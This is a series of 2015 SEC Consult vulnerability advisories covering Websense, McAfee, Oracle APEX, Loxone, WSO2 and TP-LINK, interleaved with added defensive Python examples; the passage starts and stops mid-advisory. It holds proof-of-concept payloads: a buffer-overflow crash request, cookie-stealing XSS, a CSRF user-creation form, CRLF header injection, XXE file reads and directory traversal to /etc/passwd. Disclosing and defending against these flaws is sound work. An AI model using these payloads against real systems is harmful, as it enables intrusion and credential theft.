Version 2.05 Build 150413 up to 2.06+ Build 151014


Vendor contact timeline:
---
2015-10-15: Contacting vendor through Lime Survey bug tracking system
2015-10-15: Vendor acknowledges existence of the vulnerabilities
2015-10-15: Urgent workaround is committed to Lime Survey's code repository
2015-10-16: Vendor asks for 6 weeks before the advisory is disclosed
2015-10-16: Vendor releases Lime Survey 2.06+ Build 151016 with issues fixed
2015-10-22: SEC Consult releases security advisory without PoC


Solution:
---
Immediately upgrade to Lime Survey 2.06+ Build 151016 or later.
https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015

Workaround:
---
No workaround available.


Advisory URL:
---
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm



SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network

2015-08-05 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20150805-0 >
===
  title: Stack buffer overflow in handle_debug_network
product: Websense Triton Content Manager
 vulnerable version: 8.0.0 build 1165
  fixed version: V8.0.0 HF02
 CVE number: CVE-2015-5718
 impact: high
   homepage: www.websense.com
  found: 2015-04-13
 by: C. Schwarz (Office Bangkok)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
Websense Content Gateway (Content Gateway) is a Linux-based, high-performance
Web proxy and cache that provides real-time content scanning and Web site
classification to protect network computers from malicious Web content while
controlling employee access to dynamic, user-generated Web 2.0 content. Web
content has evolved from a static information source to a sophisticated
platform for 2-way communications, which can be a valuable productivity tool
when adequately secured.

URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx


Business recommendation:
---
Attackers are able to completely compromise the Websense Content Manager with
combined targeted attack vectors.

The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the application. It is assumed that further
vulnerabilities exist within this product.


Vulnerability overview/description:
---
A stack-based buffer overflow was identified in the Websense Content Manager
administrative interface: strcpy in handle_debug_network writes past the
512-byte buffer "dest". The vulnerability can be used in combination with a
CSRF attack to crash the system or execute arbitrary code.


Proof of concept:
---
A single HTTP request is sufficient to crash the content_manager binary:

POST /submit_net_debug.cgi?mode=0menu=0item=4tab=1 HTTP/1.1
Host: content gateway:8081
[...]
Content-Length: 869

record_version=10479%3A70submit_from_page=%2Fmonitor%2Fm_net_debug.inkcmd_name=1cmd_param=[Ax2048]cmd_status=0troute_install=0tdump_install=0cmd_action=1cate=pingcate=asdapply=apply

Below is the GDB output for the process: most of the CPU's registers,
including the stack pointers of various previous frames, are overwritten with
the value 'A'.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x006becb1 in handle_debug_network (whc=<value optimized out>,
    tag=<value optimized out>, arg=<value optimized out>)
    at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
997     /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory.
        in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc
(gdb) i r
rax            0x0                  0
rbx            0x4141414141414141   4702111234474983745
rcx            0x125c0              75200
rdx            0xda3f               55871
rsi            0x3541360            55841632
rdi            0x1                  1
rbp            0x4141414141414141   0x4141414141414141
rsp            0x7f122b070618       0x7f122b070618
r8             0x4141414141414141   4702111234474983745
r9             0x4141414141414141   4702111234474983745
r10            0x4141414141414141   4702111234474983745
r11            0x3f2c35a350         271324652368
r12            0x4141414141414141   4702111234474983745
r13            0x4141414141414141   4702111234474983745
r14            0x4141414141414141   4702111234474983745
r15            0x4141414141414141   4702111234474983745
rip            0x6becb1             0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags         0x10206              [ PF IF RF ]
cs             0x33                 51
ss             0x2b                 43
ds             0x0                  0
es             0x0                  0
fs             0x0                  0
gs             0x0                  0
(gdb) bt
#0  0x006becb1 in handle_debug_network (whc=<value optimized out>,
    tag=<value optimized out>, arg=<value optimized out>)
    at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
#1  0x4141414141414141 in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141
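
A first-pass triage of a dump like the one above, as an added example (not from the advisory): it parses `info registers` and `bt` lines and reports which registers and saved return addresses consist entirely of one repeated byte, which is what separates an overwrite with attacker-supplied input from an ordinary crash. The sample is a constructed excerpt of the output.

```python
import re

# Constructed excerpt in the layout of the `info registers` and `bt` output above.
SAMPLE_GDB = """\
rax            0x0                  0
rbx            0x4141414141414141   4702111234474983745
rsi            0x3541360            55841632
rbp            0x4141414141414141   0x4141414141414141
rsp            0x7f122b070618       0x7f122b070618
r11            0x3f2c35a350         271324652368
r12            0x4141414141414141   4702111234474983745
rip            0x6becb1             0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags         0x10206              [ PF IF RF ]
#0  0x006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>)
#1  0x4141414141414141 in ?? ()
#2  0x4141414141414141 in ?? ()
"""

# "name  0xhex ..." register lines and "#n  0xhex in symbol" backtrace frames.
REG_LINE = re.compile(r"^([a-z]\w*)\s+(0x[0-9a-f]+)", re.M)
FRAME_LINE = re.compile(r"^#(\d+)\s+(0x[0-9a-f]+) in (\S+)", re.M)


def repeated_byte(value_hex, width=8):
    """If the value is one byte repeated over the full register width (the
    signature of a fill pattern copied over it), return that byte, else None."""
    raw = int(value_hex, 16).to_bytes(width, "little")
    return raw[0] if len(set(raw)) == 1 else None


def triage(text):
    """Report registers and saved return addresses that hold the fill pattern.
    Zero is ignored: a cleared register is not evidence of an overwrite."""
    controlled = {}
    for name, value in REG_LINE.findall(text):
        b = repeated_byte(value)
        if b not in (None, 0):
            controlled[name] = b
    smashed = [int(n) for n, addr, fn in FRAME_LINE.findall(text)
               if fn == "??" and repeated_byte(addr) not in (None, 0)]
    return {"controlled_registers": controlled, "smashed_frames": smashed}
```

The number of smashed frames bounds how far past the 512-byte buffer the copy ran: each unresolvable frame is one saved return address replaced by the pattern.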

SEC Consult SA-20150728-0 :: McAfee Application Control Multiple Vulnerabilities

2015-07-28 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20150728-0 >
===
  title: McAfee Application Control Multiple Vulnerabilities
product: McAfee Application Control
 vulnerable version: verified in version 6.1.3.353
  fixed version: a fixed version is currently not available
 impact: high
   homepage: www.mcafee.com/us/products/application-control.aspx
  found: 28.04.2015
 by: R. Freingruber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
McAfee Application Control software provides an effective way to block
unauthorized applications and code on servers, corporate desktops, and
fixed-function devices. This centrally managed whitelisting solution
uses a dynamic trust model and innovative security features that thwart
advanced persistent threats — without requiring signature updates or
labor-intensive list management.

Source: http://www.mcafee.com/us/products/application-control.aspx


Business recommendation:
---
By combining the vulnerabilities documented in this advisory an attacker
can completely bypass the mitigations provided by McAfee Application
Control. This especially includes the application whitelisting as well as
the read and write protections. Moreover, an attacker can attack the
availability of the system.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Injected library bypasses protections of the operating system
To add memory corruption protections (mp, mp-casp, mp-vasr,
mp-vasr-forced-relocation) McAfee Application Control injects its own
library scinject.dll into all running processes. The library allocates a
writable and executable memory region which can be used to bypass the
mitigation technique Data Execution Prevention (DEP) of the underlying
operating system. Moreover, it can also be used to bypass the mitigation
technique mp-casp from McAfee Application Control. This increases the
likelihood of successfully exploiting a memory corruption vulnerability. Since
memory corruption vulnerabilities can be used to compromise a system and to
bypass the application whitelisting protection, it is very important not to
weaken the protections provided by the operating system.


2) Software shipped with an application from 1999 which includes publicly known
vulnerabilities
McAfee Application Control installs by default a ZIP application from 1999.
The ZIP application contains publicly known vulnerabilities including a buffer
overflow. An attacker can exploit the buffer overflow vulnerability to bypass
application whitelisting. However, a public exploit is not available and
exploitation of the vulnerability is considered not trivial.


3) Multiple kernel driver vulnerabilities
An attacker can send manipulated IOCTL requests to the kernel which lead to a
system crash. These vulnerabilities can be used to affect the availability of
the system. It is expected that these vulnerabilities can also be used to
escalate privileges to kernel level.


4) Insufficient application whitelisting protection
The main feature of McAfee Application Control is application whitelisting.
SEC Consult Vulnerability Lab discovered multiple ways to bypass this protection.


5) Insufficient file system read-/write-protection
Because of the design of McAfee Application Control, write protection is
mandatory to ensure the security of application whitelisting. SEC Consult
managed to bypass the write protection to overwrite whitelisted applications
and achieve full code execution. Moreover, read protection was bypassed to
dump the contents of McAfee's password file. By bypassing write protection it
is also possible to delete the password file and interact with McAfee
Application Control without requiring a password. This can be used to
completely disable McAfee Application Control.


Proof of concept:
---
Since no fix is available for any of the described vulnerabilities, the
proof of concept section was completely removed from the advisory.


Vulnerable / tested versions:
---
The version 6.1.3.353 was found to be vulnerable.
This was the latest version at the time of discovery.


Vendor contact timeline:
---
2015-06-03: Contacting vendor through security-ale...@mcafee.com

SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express

2015-07-16 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20150716-0 >
===
  title: Permanent Cross-Site Scripting
product: Oracle Application Express
 vulnerable version: All versions prior to 4.2.3.00.08
  fixed version: 4.2.3.00.08
 CVE number: CVE-2015-2655
 impact: high
   homepage: https://apex.oracle.com/i/index.html
  found: 2014-05-28
 by: F. Lukavsky
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
- ---
Oracle Application Express (Oracle APEX) is Oracle's primary tool for
developing Web applications with SQL and PL/SQL. Using only a web browser, you
can develop and deploy professional Web-based applications for desktops and
mobile devices. It is a fully supported, no cost option of the Oracle
Database, and is installed by default in all editions of the Oracle Database.
Even those without SQL and PL/SQL knowledge can still easily install the many
built-in packaged applications, such as Survey Builder, Customer Tracker, and
P-Track (for tracking projects).

http://www.oracle.com/technetwork/developer-tools/apex/overview/index.html


Vulnerability overview/description:
- ---
The gReport Controls Sort Widget is prone to permanent cross-site scripting.
The "Display As" setting of the column attributes is ignored for the filter
list, so a stored column value is rendered without output encoding.


Proof of concept:
- -
Adding the following field to a table will cause an alertbox to display the
currently set cookies as soon as the sort options are selected for the column:

xss-entry<img src=x onerror=alert(document.cookie)>


Vulnerable / tested versions:
- -
All versions prior to 4.2.3.00.08


Vendor contact timeline:
- 
2014-08-13: Contacting vendor through secalert...@oracle.com
2014-08-14: Vendor response - vulnerability will be investigated
2014-08-15: Vendor response - issue will be tracked as S0484336
2014-08-22: Status update: Under investigation / Being fixed in main codeline
2014-09-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-10-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-11-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-12-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-01-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-02-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-03-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-04-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-05-23: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-06-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-07-11: Issue is fixed in upcoming CPU, patches will be released on 2015-07-14
2015-07-16: Coordinated release of the security advisory


Solution:
- -
Upgrade to Oracle Application Express 4.2.3.00.08.


Workaround:
- ---
Refrain from using the gReport Controls Sort Widget.


Advisory URL:
- -
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~
SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com

SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)

2015-05-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20150514-0 >
===
  title: Multiple vulnerabilities
product: Loxone Smart Home
 vulnerable version: Firmware version 6.4.5.12
  fixed version: 6.4.5.12
 impact: Critical
   homepage: http://www.loxone.com
  found: 2015-03-12
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor & product description:
-
Loxone Electronics was founded in 2009. Our focus is the development and
production of control solutions for all homes. Our aim is to make home
automation interesting, affordable and accessible for everyone.

URL: http://www.loxone.com/enus/company/about-us.html


Business recommendation:

Most of the issues previously identified (see SEC Consult security advisory
SA-20150227-0) seem not to have been fixed properly and are still exploitable
either directly or by easily bypassing implemented measures. A very short
crash-test of only a few hours even resulted in new vulnerabilities.

The Loxone smart home has multiple design and implementation flaws which
combined could be used by an attacker to:
1) remotely cause a denial of service condition which renders the smart
   home unusable which would effectively disable any Loxone-controlled
   alarm system,
2) steal the user's credentials for the management interface and fully
   control the smart home,
3) execute JavaScript code in the user's browser for further attacks,
4) control arbitrary devices connected to the system, e.g. switch on/off
   lights, remotely open doors or garages, disable alarm system, etc.,
5) gain access to admin passwords of Loxone partners (e.g. electricians
   who are implementing the smart home solution at customers) and
   completely take over other smart homes of the same Loxone partner!

It is recommended by SEC Consult not to use this smart home system until a
thorough security analysis (white box) of all components has been performed by
security professionals, as a very short crash test (Blackbox) already resulted
in critical vulnerabilities.


Vulnerability overview/description:
---
1) Cross-site request-forgery (XSRF)
The system is vulnerable to XSRF attacks. If an attacker is able to lure a user
into clicking a crafted link or by embedding such a link within web pages (e.g.
discussion forums) he could control arbitrary functions within the smart home
system.
All functions can be controlled via web based commands, e.g. in order to switch
on lights, remotely open doors or garages, disable the alarm system, etc.

This can still be exploited in the current Loxone version and it does not seem
to be fixed properly.


2) HTTP Response Splitting / Header injection
The web server of the Loxone smart home system is vulnerable to HTTP response
splitting attacks. If an attacker is able to lure a user into clicking a
crafted link (e.g. just by clicking a URL in a discussion forum or
phishing email) he could arbitrarily manipulate the server's response (e.g.
injection of JavaScript code).

This can still be exploited in the current Loxone version and it does not seem
to be fixed properly. The implemented measures/filters can be easily bypassed
using double-encoded payloads.

This attack is not limited to the admin interface; it can be exploited in any
path of the web server.

SEC Consult has verified this attack in the most current versions of Mozilla
Firefox and Google Chrome web browsers.
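The following Python example is added here and is not code from the advisory or from Loxone; it models the double-decoding flaw the advisory describes. A constructed redirect handler decodes the parameter once, filters the decoded string for raw CR/LF, and then decodes a second time while building the response, so a payload encoded as %250d%250a passes the filter and becomes a CRLF on the wire. The hardened handler decodes exactly once and validates the bytes that are actually written into the header. The endpoint shape, the `Location` header use and the payloads are assumptions for illustration.

```python
from urllib.parse import unquote


def write_header(name, value):
    """Emit one header line. Refuses CR, LF and NUL in the value that is
    actually written; this is the one place an encoding trick cannot bypass."""
    if any(c in value for c in "\r\n\x00"):
        raise ValueError("control character in header %s" % name)
    return "%s: %s\r\n" % (name, value)


def vulnerable_redirect(raw_param):
    """Constructed stand-in for the flawed flow: decode once, filter the decoded
    string for raw CR/LF, then decode again while building the response."""
    once = unquote(raw_param)
    if "\r" in once or "\n" in once:               # the filter sees no CRLF in %0d%0a
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    twice = unquote(once)                          # the bug: second decode after the filter
    return "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\n\r\n" % twice


def hardened_redirect(raw_param):
    """Decode exactly once and validate the value that goes on the wire.
    A production server would additionally percent-encode the final value."""
    target = unquote(raw_param)
    try:
        location = write_header("Location", target)
    except ValueError:
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return "HTTP/1.1 302 Found\r\n" + location + "Content-Length: 0\r\n\r\n"


def parse_response(raw):
    """Split a response the way a browser does: the first blank line ends the headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


# Constructed payloads: single-encoded CRLF, and the double-encoded variant
SINGLE = "/%0d%0aSet-Cookie:%20pwned=1"
DOUBLE = "/%250d%250aSet-Cookie:%20pwned=1%250d%250a%250d%250a<html>injected</html>"

if __name__ == "__main__":
    for label, payload in (("single", SINGLE), ("double", DOUBLE)):
        status, headers, body = parse_response(vulnerable_redirect(payload))
        print("vulnerable/%s: %s, Set-Cookie injected: %s" % (label, status, "Set-Cookie" in headers))
        status, headers, body = parse_response(hardened_redirect(payload))
        print("hardened/%s:   %s, Set-Cookie injected: %s" % (label, status, "Set-Cookie" in headers))
```

The injected `Set-Cookie` header and the attacker-controlled body after the second blank line are what make the issue an unauthenticated vector for the XSS in 3): the browser treats everything after the injected CRLF CRLF as the response body.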


3) Reflected cross-site scripting (XSS) vulnerability
The web interface of Loxone smart home is vulnerable to reflected cross-site
scripting attacks. If an attacker is able to lure a user into clicking a
crafted link (e.g. just by clicking a URL in a discussion forum or phishing
email) he could execute arbitrary JavaScript code in the user's browser.
Thereby he could steal the user's credentials or control arbitrary devices
within the smart home system. To exploit this vulnerability it isn't mandatory
for the user to be authenticated: unauthenticated XSS vulnerabilities exist
(by exploiting the HTTP response splitting vulnerability described in 2) as
well as authenticated ones.

SEC Consult has verified this attack in the most current versions of Mozilla
Firefox and Google Chrome web browsers.


4) Denial of service
An attacker could perform a denial of service attack with simple measures, such
as SYN flood attacks. During such an attack the system isn't accessible via the
network and can't be controlled.

SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server

2015-05-13 Thread SEC Consult Vulnerability Lab
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >
===
  title: Multiple critical vulnerabilities
product: WSO2 Identity Server
 other WSO2 Carbon based products may be affected too
 vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
  fixed version: 5.0.0 with patches 1194 and 1095 applied
 CVE number:
 impact: critical
   homepage: http://wso2.com/products/identity-server/
  found: 2015-02-19
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
- ---
WSO2 Identity Server provides sophisticated security and identity management
of enterprise web applications, services, and APIs, and makes life easier for
developers and architects with its hassle-free, minimal monitoring and
maintenance requirements. In its latest version, Identity Server acts as an
Enterprise Identity Bus (EIB) — a central backbone to connect and manage
multiple identities regardless of the standards on which they are based.

URL: http://wso2.com/products/identity-server/

Business recommendation:
- 
The WSO2 Identity Server has three security vulnerabilities that allow an
attacker to take over administrative user sessions and read arbitrary
local files. Moreover, the XXE vulnerability potentially allows an
attacker to conduct further attacks on internal servers since the
vulnerability may allow an attacker to bypass firewall rules.

SEC Consult only conducted a very quick and narrow check on the
WSO2 Identity Server. Since in this check a critical vulnerability was
found, SEC Consult suspects that the Identity Server contains even
more critical vulnerabilities.

Since other WSO2 products are based on the same framework (WSO2 Carbon
Framework), it is possible that these or similar vulnerabilities affect
other products too.

SEC Consult recommends to not use any products based on the WSO2 Carbon
Framework until a thorough security review has been conducted.


Vulnerability overview/description:
- ---
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected cross-site scripting
vulnerabilities. An attacker can lure a victim that is logged in on the
Identity Server administration web interface to e.g. click on a link and
take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least one web page, CSRF protection has not been implemented. An
attacker on the internet could lure a victim that is logged in on the
Identity Server administration web interface onto a web page e.g. containing
a manipulated img tag. The attacker is then able to add arbitrary users
to the Identity Server.

3) XML external entity injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to
inject arbitrary external XML entities. This allows an attacker to read
arbitrary local files. Moreover, since the XML entity resolver allows
remote URLs, this vulnerability may allow to bypass firewall rules
and conduct further attacks on internal hosts.
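As an added example (Python; not WSO2 code and not part of the advisory), the following is the pre-parse gate an identity provider can put in front of its SAML endpoint: it walks the inbound message with expat and refuses any DOCTYPE or entity declaration before the document reaches a parser that might resolve external entities, which covers both the local file read and the outbound request to internal hosts described above. The SAML messages are constructed samples, and the `issuer_of` helper is an assumed stand-in for the real SAML processing.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class DtdNotAllowed(ValueError):
    """Raised when an inbound document carries a DOCTYPE or an entity declaration."""


def reject_dtd(xml_bytes):
    """Abort on the first DOCTYPE or entity declaration. expat does not fetch
    external entities unless an ExternalEntityRefHandler is installed, so this
    pass itself cannot trigger a file read or an outbound request."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE %r (SYSTEM %r) rejected" % (name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        raise DtdNotAllowed("entity %r (SYSTEM %r) rejected" % (name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)


SAML_NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}


def issuer_of(saml_bytes):
    """Return the Issuer of an AuthnRequest, or None if the message is refused.
    Assumed stand-in for the real SAML handling: the gate runs first, the
    DTD-free document is then parsed normally."""
    try:
        reject_dtd(saml_bytes)
    except (DtdNotAllowed, xml.parsers.expat.ExpatError):
        return None
    root = ET.fromstring(saml_bytes)
    issuer = root.find("saml:Issuer", SAML_NS)
    return None if issuer is None else issuer.text


# Constructed samples: a benign request, an internal-subset XXE and an external DTD
BENIGN = b"""<?xml version="1.0"?>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_req1" Version="2.0">
  <saml:Issuer>https://sp.example/metadata</saml:Issuer>
</samlp:AuthnRequest>"""

XXE = b"""<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_req2" Version="2.0">
  <saml:Issuer>&xxe;</saml:Issuer>
</samlp:AuthnRequest>"""

EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE AuthnRequest SYSTEM "http://internal-host.example/evil.dtd">
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"/>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE), ("external dtd", EXTERNAL_DTD)):
        print("%-13s -> %r" % (label, issuer_of(doc)))
```

The gate is placed before the XML parser rather than inside it because the resolver configuration of the underlying library is what was wrong in the product; a regex on the raw bytes would be the weaker alternative, since it does not handle the encodings the XML declaration can select.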


Proof of concept:
- -
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When opening the following URL an alert-box is shown as an example:
http://host:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following
request, an alert-box is shown:
-  snip 
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: host:9443
Cookie: cookies
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
-  snip 
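The example below is added here and is not code from the advisories, from Oracle or from WSO2. It shows, in Python, why the two injected values on this page execute (the APEX `xss-entry<img ...>` value lands in element content, the WSO2 `returnPath` value closes a quoted attribute) and that encoding for the right HTML context keeps the data intact while stopping the script. The `<li>` and `<input>` templates are constructed stand-ins for the real pages, whose markup is not reproduced in the advisories; the tag collector stands in for how a browser tokenises the result.

```python
import html
from html.parser import HTMLParser

# Payloads as given in the APEX and WSO2 advisories
APEX_PAYLOAD = "xss-entry<img src=x onerror=alert(document.cookie)>"
WSO2_PAYLOAD = '../userstore/index.jsp"><script>alert(document.cookie)</script>'


def filter_item_vulnerable(value):
    """Constructed stand-in: stored column value dropped into element content."""
    return '<li class="filter-item">%s</li>' % value


def filter_item_safe(value):
    """Same markup, value encoded for the element-content context."""
    return '<li class="filter-item">%s</li>' % html.escape(value, quote=False)


def return_path_vulnerable(value):
    """Constructed stand-in: request parameter dropped into a quoted attribute."""
    return '<input type="hidden" name="returnPath" value="%s"/>' % value


def return_path_safe(value):
    """quote=True also encodes the quote characters, so the value cannot
    terminate the attribute and start a new tag."""
    return '<input type="hidden" name="returnPath" value="%s"/>' % html.escape(value, quote=True)


class TagCollector(HTMLParser):
    """Records the start tags a browser-like tokeniser sees, with their attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)


def tags_in(markup):
    """Return (list of start tags, attributes per tag) for a markup fragment."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.attrs


if __name__ == "__main__":
    for render in (filter_item_vulnerable, filter_item_safe):
        print("%-24s tags=%s" % (render.__name__, tags_in(render(APEX_PAYLOAD))[0]))
    for render in (return_path_vulnerable, return_path_safe):
        print("%-24s tags=%s" % (render.__name__, tags_in(render(WSO2_PAYLOAD))[0]))
```

The safe attribute rendering is the interesting case: the parser still hands the application back the original `returnPath` string as the attribute value, so no functionality is lost, but no `<script>` element ever comes into existence.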

2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:
-  snip 
<form method="POST" action="https://host:9443/carbon/user/add-finish.jsp">
  <input type="text" name="domain" value="PRIMARY"/>
  <input type="text" name="username" value="secconsult"/>
  <input type="text" name="password" value="test123"/>
  <input type="submit"/>
</form>
-  snip 

3) XML external entity injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server

SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)

2015-04-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20150410-0 >
===
  title: Unauthenticated Local File Disclosure
product: Multiple TP-LINK products (see Vulnerable / tested 
versions)
 vulnerable version: Multiple (see Vulnerable / tested versions)
  fixed version: see Solution
 CVE number: CVE-2015-3035
 impact: Critical
   homepage: http://tp-link.com
  found: 2015-02-19
 by: Stefan Viehböck (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
TP-LINK is a global provider of SOHO & SMB networking products and the World's
No.1 provider of WLAN products, with products available in over 120 countries
to tens of millions customers. Committed to intensive R&D, efficient production
and strict quality management, TP-LINK continues to provide award-winning
networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline
Adapters, Print Servers, Media Converters and Network Adapters for Global
end-users.

Source: http://www.tp-link.us/about/?categoryid=102


Business recommendation:

Attackers can read sensitive configuration files without prior authentication.
These files e.g. include the administrator credentials and the WPA passphrase.

TP-LINK has provided fixed firmware which should be installed immediately.


Vulnerability overview/description:
---
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Proof of concept:
-
The following HTTP request shows how directory traversal can be used to gain
access to files without prior authentication:
===
GET /login/../../../etc/passwd HTTP/1.1
Host: $host

===

The server response includes the contents of the file:
===
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 683
Content-Type: text/html

